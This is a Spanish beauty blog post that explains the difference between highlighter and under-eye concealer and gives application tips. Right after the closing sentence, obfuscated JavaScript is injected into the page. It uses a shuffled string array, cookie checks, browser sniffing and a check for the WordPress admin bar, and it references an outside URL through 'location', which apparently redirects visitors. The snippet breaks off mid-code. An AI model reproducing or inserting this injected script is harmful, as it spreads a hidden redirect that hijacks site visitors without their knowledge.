1-.) El iluminador corrige imperfecciones en el rostro y unifica el tono. Es conveniente aplicarlo en las ojeras, aletas de la nariz, comisuras de los labios y por supuesto, el lagrimal. Sus principales características son las siguientes:

– Actúa como reflectante de la luz

– Muestra un tono más claro, aportando luminosidad a tu piel

– Elimina el aspecto apagado del rostro

– Amplia la mirada

– Afina rasgos

Usar un iluminador en un tono demasiado claro puede mostrar un aspecto anti-natural. Si tienes marcas o manchas, el iluminador no las eliminará ni difuminará, solo conseguirá destacarlas más. No lo uses solo con la intención de tapar, su función principal es aportar luminosidad en zonas oscuras de tu rostro.

2-.) El antiojeras permite dar luz en las zonas donde más te interesa y resaltar zonas bonitas del rostro.

Si quieres conocer cuáles son los beneficios y características que lo distinguen del iluminador toma nota:

– Cubre las zonas del rostro que deseas tapas

– Difumina imperfecciones

– Mantiene una tez con un tono uniforme

– Elimina bolsas y ojeras instantáneamente

– Tapa las pequeñas líneas de expresión

El anti-ojeras no debe usarse en exceso. Lo ideal es aplicar el color más parecido al tono natural de tu piel, ni más claro ni más oscuro y siempre lo mejor es aplicar la cantidad justa. ¡No abuses! El corrector corrige, cubre y difumina pero no tiene porque dar luz a tu rostro.

Ahora que tienes claro estas diferencias, podrás lucir un maquillaje perfecto e iluminado de la mejor manera. 😉 var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone